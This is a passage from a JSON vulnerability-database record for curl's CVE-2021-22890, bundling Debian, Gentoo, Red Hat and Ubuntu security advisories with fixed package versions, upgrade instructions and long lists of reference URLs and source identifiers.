Varnavas Papaioannou reported that a malicious server could use the\n    PASV response to trick curl into connecting back to an arbitrary IP\n    address and port, potentially making curl extract information about\n    services that are otherwise private and not disclosed. \n\nCVE-2020-8285\n\n    xnynx reported that libcurl could run out of stack space when using\n    tha FTP wildcard matching functionality (CURLOPT_CHUNK_BGN_FUNCTION). \n\nCVE-2020-8286\n\n    It was reported that libcurl didn\u0027t verify that an OCSP response\n    actually matches the certificate it is intended to. \n\nCVE-2021-22876\n\n    Viktor Szakats reported that libcurl does not strip off user\n    credentials from the URL when automatically populating the Referer\n    HTTP request header field in outgoing HTTP requests. \n\nFor the stable distribution (buster), these problems have been fixed in\nversion 7.64.0-4+deb10u2. \n\nWe recommend that you upgrade your curl packages. \n\nFor the detailed security status of curl please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/curl\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQIzBAEBCgAdFiEEBsId305pBx+F583DbwzL4CFiRygFAmBkQCoACgkQbwzL4CFi\nRyg6Gg/+LqhhJ8+D7skevVkYzxHzdH2yT/XMeoYp0D37yHmEfH9PyjXwfplG+XEw\n/xwFRBK8qxD1ja+rQddYyeTvi1OMnMgMS3UsRHlfeMnLxh2+oHnvHDYG848npUEZ\nRq4YFoc/n9YTAJZP/G4oiuBeXqH2Sqa5hSNT6VrYfRciCxkYnzA78b85KpI8aYyR\nlhfiJMNpwrqDbt/QzblpELBkGMIV402VeiqDwHfcVzm2E810xXQNLvPMbWtvDYkA\nTSrNsdqfuFr1tuQSZY6CGSWEyXtB/tOo8+pvUixlJMBWJMl5TXEcJkD5ckehx0yb\nC3n9yapfklxHiG9lD4zwwIJDqd3Y4SxdDiSlUC4OhdvpwniMygX0S3ICaPA4iac/\ncWanml0Fop3OmRy+vQURTd3sADoT5HoRSUXZVU+HdTrRaEt2xs5okZkWSd3yr4Ux\ni+HgjUAFkkk8DLRB68Bbpx1LGxFGQT7L8yd4wsWINXlzASIP1A5dnNfE5w0VWOHG\n3KDq47wNfjuiZC8GXW+HQCxz5MijnS8Y/Egl0OozNFDwEitNBZEsIjpZaZBdZIwi\nUFfcK7+u/y/TRY54rA4erkdcHFwpYW5EZVGdb7Z+WPWVlzw0ImXrM68LSAhHQaqW\n1Hx4VwwwTsMIPnrx2kriRiiDPOW1r5Kip3yHa+QZLedSRGibQWk=\n=001T\n-----END PGP SIGNATURE-----\n. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory                           GLSA 202105-36\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n                                            https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n  Severity: High\n     Title: cURL: Multiple vulnerabilities\n      Date: May 26, 2021\n      Bugs: #779535, #792192\n        ID: 202105-36\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in cURL, the worst of which\ncould result in the arbitrary execution of code. \n\nBackground\n==========\n\nA command line tool and library for transferring data with URLs. \n\nAffected packages\n=================\n\n     -------------------------------------------------------------------\n      Package              /     Vulnerable     /            Unaffected\n     -------------------------------------------------------------------\n   1  net-misc/curl                \u003c 7.77.0                  \u003e= 7.77.0\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in cURL. Please review\nthe CVE identifiers referenced below for details. \n\nImpact\n======\n\nPlease review the referenced CVE identifiers for details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll cURL users should upgrade to the latest version:\n\n   # emerge --sync\n   # emerge --ask --oneshot --verbose \"\u003e=net-misc/curl-7.77.0\"\n\nReferences\n==========\n\n[ 1 ] CVE-2021-22876\n       https://nvd.nist.gov/vuln/detail/CVE-2021-22876\n[ 2 ] CVE-2021-22890\n       https://nvd.nist.gov/vuln/detail/CVE-2021-22890\n[ 3 ] CVE-2021-22898\n       https://nvd.nist.gov/vuln/detail/CVE-2021-22898\n[ 4 ] CVE-2021-22901\n       https://nvd.nist.gov/vuln/detail/CVE-2021-22901\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n  https://security.gentoo.org/glsa/202105-36\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2021 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttps://creativecommons.org/licenses/by-sa/2.5\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.37 SP8 security update\nAdvisory ID:       RHSA-2021:2471-01\nProduct:           Red Hat JBoss Core Services\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2021:2471\nIssue date:        2021-06-17\nCVE Names:         CVE-2020-8169 CVE-2020-8284 CVE-2020-8285 \n                   CVE-2020-8286 CVE-2021-22876 CVE-2021-22890 \n                   CVE-2021-22901 CVE-2021-31618 \n=====================================================================\n\n1. Summary:\n\nRed Hat JBoss Core Services Pack Apache Server 2.4.37 Service Pack 8 zip\nrelease for RHEL 7, RHEL 8 and Microsoft Windows is available. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Description:\n\nRed Hat JBoss Core Services is a set of supplementary software for Red Hat\nJBoss middleware products. This software, such as Apache HTTP Server, is\ncommon to multiple JBoss middleware products, and is packaged under Red Hat\nJBoss Core Services to allow for faster distribution of updates, and for a\nmore consistent update experience. \n\nThis release adds the new Apache HTTP Server 2.4.37 Service Pack 8 packages\nthat are part of the JBoss Core Services offering. \n\nThis release serves as a replacement for Red Hat JBoss Core Services Pack\nApache Server 2.4.37 Service Pack 7 and includes bug fixes and\nenhancements. Refer to the Release Notes for information on the most\nsignificant bug fixes and enhancements included in this release. \n\nSecurity Fix(es):\n\n* curl: Use-after-free in TLS session handling when using OpenSSL TLS\nbackend (CVE-2021-22901)\n\n* httpd: NULL pointer dereference on specially crafted HTTP/2 request\n(CVE-2021-31618)\n\n* libcurl: partial password leak over DNS on HTTP redirect (CVE-2020-8169)\n\n* curl: FTP PASV command response can cause curl to connect to arbitrary\nhost (CVE-2020-8284)\n\n* curl: Malicious FTP server can trigger stack overflow when\nCURLOPT_CHUNK_BGN_FUNCTION is used (CVE-2020-8285)\n\n* curl: Inferior OCSP verification (CVE-2020-8286)\n\n* curl: Leak of authentication credentials in URL via automatic Referer\n(CVE-2021-22876)\n\n* curl: TLS 1.3 session ticket mix-up with HTTPS proxy host\n(CVE-2021-22890)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\n3. Solution:\n\nBefore applying the update, back up your existing installation, including\nall applications, configuration files, databases and database settings, and\nso on. \n\nThe References section of this erratum contains a download link for the\nupdate. You must be logged in to download the update. \n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1847916 - CVE-2020-8169 libcurl: partial password leak over DNS on HTTP redirect\n1902667 - CVE-2020-8284 curl: FTP PASV command response can cause curl to connect to arbitrary host\n1902687 - CVE-2020-8285 curl: Malicious FTP server can trigger stack overflow when CURLOPT_CHUNK_BGN_FUNCTION is used\n1906096 - CVE-2020-8286 curl: Inferior OCSP verification\n1941964 - CVE-2021-22876 curl: Leak of authentication credentials in URL via automatic Referer\n1941965 - CVE-2021-22890 curl: TLS 1.3 session ticket mix-up with HTTPS proxy host\n1963146 - CVE-2021-22901 curl: Use-after-free in TLS session handling when using OpenSSL TLS backend\n1968013 - CVE-2021-31618 httpd: NULL pointer dereference on specially crafted HTTP/2 request\n\n5. References:\n\nhttps://access.redhat.com/security/cve/CVE-2020-8169\nhttps://access.redhat.com/security/cve/CVE-2020-8284\nhttps://access.redhat.com/security/cve/CVE-2020-8285\nhttps://access.redhat.com/security/cve/CVE-2020-8286\nhttps://access.redhat.com/security/cve/CVE-2021-22876\nhttps://access.redhat.com/security/cve/CVE-2021-22890\nhttps://access.redhat.com/security/cve/CVE-2021-22901\nhttps://access.redhat.com/security/cve/CVE-2021-31618\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=core.service.apachehttp\u0026downloadType=securityPatches\u0026version=2.4.37\nhttps://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=core.service.openssl\u0026downloadType=securityPatches\u0026version=1.1.1g\nhttps://access.redhat.com/documentation/en-us/red_hat_jboss_core_services/2.4.37/\n\n6. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYMszstzjgjWX9erEAQgW2Q//cZOMa4KOvz7KejR03sHk7m8aMHDRdPDe\nKi6PTe99phprmuXNPOCPGFuWDXbdpAlyEx3Elt3Ah+vmpV+K7ThwXGXJkGwb6mol\n2xAFvcwxxO6GNsCl8gYW+JTG+5HYLZ/U4q3lgHId9qfzmuRRg0zwOuwZC7y7R6kP\n3H1o1WRiIKEA1oHCh3f3OizTrkOcBZsWINsJ2ggW+ZqVeve4PJH55F3JwCJbIuhd\nkUhe1QQjiANWq4m/+QkTRtIYzahqK+lIubpoU5P+sFosc7ASUGe29ZPC9LsfY4hx\n61bSxXbxTv2wcBaUrg/TAxRplQdHRbZe8s8eWhMtDoNHRqujYOiKHUnBgdoY6oLd\n3gfAGI3w2NnWRDodGDGXfuDu6hncAukvxqOO/tOnRd2n7/R52ewGCsNKvsf/OHRG\n1X7UeD4DJvXiqBNOtPaqOjR3q7xdO5MhYtkvh/8mzvhx5X/CojUWRWmtSdJDhpvQ\nPOl+hJjFqEFTUJk/VGDJ7HsIs5OqeoV0pURP3VvYyBF75xp3aYI8Gfb1wLoqXmp2\niFhSTskqEc42iMvG/Ks5Rb1wQLrJ4RNgxunGofmNQusjgN406aAqvE79a6JUmt/z\n7Z6i8Tvy9PGgNtbnalyxbikpA8Qcoxoij2pbIcSNIJXW+mA74QtI3AC4+4m0V90H\nbutyhmDY1nQ=\n=gsJD\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nAfter installing the updated packages, the httpd daemon will be restarted\nautomatically. Applications using the APR libraries, such as httpd, must be\nrestarted for this update to take effect.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. ==========================================================================\nUbuntu Security Notice USN-4898-1\nMarch 31, 2021\n\ncurl vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 20.10\n- Ubuntu 20.04 LTS\n- Ubuntu 18.04 LTS\n- Ubuntu 16.04 LTS\n\nSummary:\n\ncurl could be made to expose sensitive information over the network. A remote attacker could possibly use this\nissue to obtain sensitive information. A remote attacker in control of an HTTPS proxy could\nuse this issue to bypass certificate checks and intercept communications. \nThis issue only affected Ubuntu 20.04 LTS and Ubuntu 20.10. \n(CVE-2021-22890)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 20.10:\n  curl                            7.68.0-1ubuntu4.3\n  libcurl3-gnutls                 7.68.0-1ubuntu4.3\n  libcurl3-nss                    7.68.0-1ubuntu4.3\n  libcurl4                        7.68.0-1ubuntu4.3\n\nUbuntu 20.04 LTS:\n  curl                            7.68.0-1ubuntu2.5\n  libcurl3-gnutls                 7.68.0-1ubuntu2.5\n  libcurl3-nss                    7.68.0-1ubuntu2.5\n  libcurl4                        7.68.0-1ubuntu2.5\n\nUbuntu 18.04 LTS:\n  curl                            7.58.0-2ubuntu3.13\n  libcurl3-gnutls                 7.58.0-2ubuntu3.13\n  libcurl3-nss                    7.58.0-2ubuntu3.13\n  libcurl4                        7.58.0-2ubuntu3.13\n\nUbuntu 16.04 LTS:\n  curl                            7.47.0-1ubuntu2.19\n  libcurl3                        7.47.0-1ubuntu2.19\n  libcurl3-gnutls                 7.47.0-1ubuntu2.19\n  libcurl3-nss                    7.47.0-1ubuntu2.19\n\nIn general, a standard system update will make all the necessary changes",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-22890"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-002808"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-975"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-22890"
      },
      {
        "db": "PACKETSTORM",
        "id": "169015"
      },
      {
        "db": "PACKETSTORM",
        "id": "162817"
      },
      {
        "db": "PACKETSTORM",
        "id": "163193"
      },
      {
        "db": "PACKETSTORM",
        "id": "163197"
      },
      {
        "db": "PACKETSTORM",
        "id": "162037"
      }
    ],
    "trust": 2.7
  },
  "external_ids": {
    "_id": null,
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2021-22890",
        "trust": 3.0
      },
      {
        "db": "HACKERONE",
        "id": "1129529",
        "trust": 1.7
      },
      {
        "db": "SIEMENS",
        "id": "SSA-389290",
        "trust": 1.7
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-002808",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "162817",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "163193",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "162037",
        "trust": 0.7
      },
      {
        "db": "CS-HELP",
        "id": "SB2021041363",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-975",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1129",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2168",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1114",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2023.3146",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1118",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021052711",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021062142",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2022031104",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-1709",
        "trust": 0.6
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-22-069-09",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-22890",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "169015",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163197",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-22890"
      },
      {
        "db": "PACKETSTORM",
        "id": "169015"
      },
      {
        "db": "PACKETSTORM",
        "id": "162817"
      },
      {
        "db": "PACKETSTORM",
        "id": "163193"
      },
      {
        "db": "PACKETSTORM",
        "id": "163197"
      },
      {
        "db": "PACKETSTORM",
        "id": "162037"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-002808"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-975"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-1709"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-22890"
      }
    ]
  },
  "id": "VAR-202104-0328",
  "iot": {
    "_id": null,
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.625
  },
  "last_update_date": "2025-06-09T19:56:53.106000Z",
  "patch": {
    "_id": null,
    "data": [
      {
        "title": "hitachi-sec-2021-132",
        "trust": 0.8,
        "url": "https://www.broadcom.com/"
      },
      {
        "title": "HAXX libcurl Security vulnerabilities",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=145993"
      },
      {
        "title": "Debian CVElist Bug Report Logs: curl: CVE-2021-22890",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=070f9241d84352ce262145cf1828f6f7"
      },
      {
        "title": "Red Hat: CVE-2021-22890",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2021-22890"
      },
      {
        "title": "Arch Linux Issues: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=CVE-2021-22890 log"
      },
      {
        "title": "Hitachi Security Advisories: Vulnerability in JP1/Automatic Job Management System 3",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=hitachi_security_advisories\u0026qid=hitachi-sec-2021-132"
      },
      {
        "title": "Debian Security Advisories: DSA-4881-1 curl -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=a9706a30f62799ecc4d45bdb53c244eb"
      },
      {
        "title": "Brocade Security Advisories: Access Denied",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=brocade_security_advisories\u0026qid=b1e904198be8e0726ebde78ffc5fac9a"
      },
      {
        "title": "Siemens Security Advisories: Siemens Security Advisory",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=4a9822530e6b610875f83ffc10e02aba"
      },
      {
        "title": "Siemens Security Advisories: Siemens Security Advisory",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=ec6577109e640dac19a6ddb978afe82d"
      },
      {
        "title": "clair-client",
        "trust": 0.1,
        "url": "https://github.com/indece-official/clair-client "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-22890"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-002808"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-1709"
      }
    ]
  },
  "problemtype_data": {
    "_id": null,
    "data": [
      {
        "problemtype": "CWE-290",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-300",
        "trust": 1.0
      },
      {
        "problemtype": "Avoid authentication by spoofing (CWE-290) [NVD Evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-002808"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-22890"
      }
    ]
  },
  "references": {
    "_id": null,
    "data": [
      {
        "trust": 1.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22890"
      },
      {
        "trust": 1.8,
        "url": "https://security.gentoo.org/glsa/202105-36"
      },
      {
        "trust": 1.7,
        "url": "https://hackerone.com/reports/1129529"
      },
      {
        "trust": 1.7,
        "url": "https://curl.se/docs/cve-2021-22890.html"
      },
      {
        "trust": 1.7,
        "url": "https://security.netapp.com/advisory/ntap-20210521-0007/"
      },
      {
        "trust": 1.7,
        "url": "https://www.oracle.com//security-alerts/cpujul2021.html"
      },
      {
        "trust": 1.7,
        "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf"
      },
      {
        "trust": 1.1,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/itvwpvglfisu5bjc2bxbrysdxtxe2ygc/"
      },
      {
        "trust": 1.1,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/kquioyx2kuu6fiuzvb5wwz6jhssysqwj/"
      },
      {
        "trust": 1.1,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2zc5bmioklbqjsfchedn2g2c2sh274bp/"
      },
      {
        "trust": 0.9,
        "url": "https://access.redhat.com/security/cve/cve-2021-22890"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021041363"
      },
      {
        "trust": 0.6,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2zc5bmioklbqjsfchedn2g2c2sh274bp/"
      },
      {
        "trust": 0.6,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/itvwpvglfisu5bjc2bxbrysdxtxe2ygc/"
      },
      {
        "trust": 0.6,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/kquioyx2kuu6fiuzvb5wwz6jhssysqwj/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/162037/ubuntu-security-notice-usn-4898-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-was-identified-and-remediated-in-the-ibm-maas360-cloud-extender-v2-103-000-051-and-modules/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/163193/red-hat-security-advisory-2021-2471-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/162817/gentoo-linux-security-advisory-202105-36.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021052711"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1118"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1129"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2023.3146"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/libcurl-man-in-the-middle-via-tls-1-3-session-ticket-proxy-host-mixup-34978"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1114"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-curl-affect-powersc-cve-2021-22876-and-cve-2021-22890/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2168"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021062142"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2022031104"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22876"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-8284"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-8285"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-8286"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-8169"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22901"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-22901"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-8286"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-8285"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-22876"
      },
      {
        "trust": 0.2,
        "url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-31618"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-31618"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-8284"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-8169"
      },
      {
        "trust": 0.2,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/290.html"
      },
      {
        "trust": 0.1,
        "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986270"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-069-09"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-8231"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "https://security-tracker.debian.org/tracker/curl"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-8177"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22898"
      },
      {
        "trust": 0.1,
        "url": "https://bugs.gentoo.org."
      },
      {
        "trust": 0.1,
        "url": "https://security.gentoo.org/"
      },
      {
        "trust": 0.1,
        "url": "https://creativecommons.org/licenses/by-sa/2.5"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=core.service.apachehttp\u0026downloadtype=securitypatches\u0026version=2.4.37"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=core.service.openssl\u0026downloadtype=securitypatches\u0026version=1.1.1g"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_core_services/2.4.37/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2471"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2472"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-4898-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/curl/7.68.0-1ubuntu4.3"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/curl/7.68.0-1ubuntu2.5"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/curl/7.47.0-1ubuntu2.19"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/curl/7.58.0-2ubuntu3.13"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-22890"
      },
      {
        "db": "PACKETSTORM",
        "id": "169015"
      },
      {
        "db": "PACKETSTORM",
        "id": "162817"
      },
      {
        "db": "PACKETSTORM",
        "id": "163193"
      },
      {
        "db": "PACKETSTORM",
        "id": "163197"
      },
      {
        "db": "PACKETSTORM",
        "id": "162037"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-002808"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-975"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-1709"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-22890"
      }
    ]
  },
  "sources": {
    "_id": null,
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2021-22890",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "169015",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "162817",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "163193",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "163197",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "162037",
        "ident": null
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-002808",
        "ident": null
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-975",
        "ident": null
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-1709",
        "ident": null
      },
      {
        "db": "NVD",
        "id": "CVE-2021-22890",
        "ident": null
      }
    ]
  },
  "sources_release_date": {
    "_id": null,
    "data": [
      {
        "date": "2021-04-01T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-22890",
        "ident": null
      },
      {
        "date": "2021-03-28T19:12:00",
        "db": "PACKETSTORM",
        "id": "169015",
        "ident": null
      },
      {
        "date": "2021-05-26T17:36:11",
        "db": "PACKETSTORM",
        "id": "162817",
        "ident": null
      },
      {
        "date": "2021-06-17T18:01:23",
        "db": "PACKETSTORM",
        "id": "163193",
        "ident": null
      },
      {
        "date": "2021-06-17T18:09:26",
        "db": "PACKETSTORM",
        "id": "163197",
        "ident": null
      },
      {
        "date": "2021-03-31T14:30:52",
        "db": "PACKETSTORM",
        "id": "162037",
        "ident": null
      },
      {
        "date": "2021-10-05T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-002808",
        "ident": null
      },
      {
        "date": "2021-04-13T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202104-975",
        "ident": null
      },
      {
        "date": "2021-03-31T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202103-1709",
        "ident": null
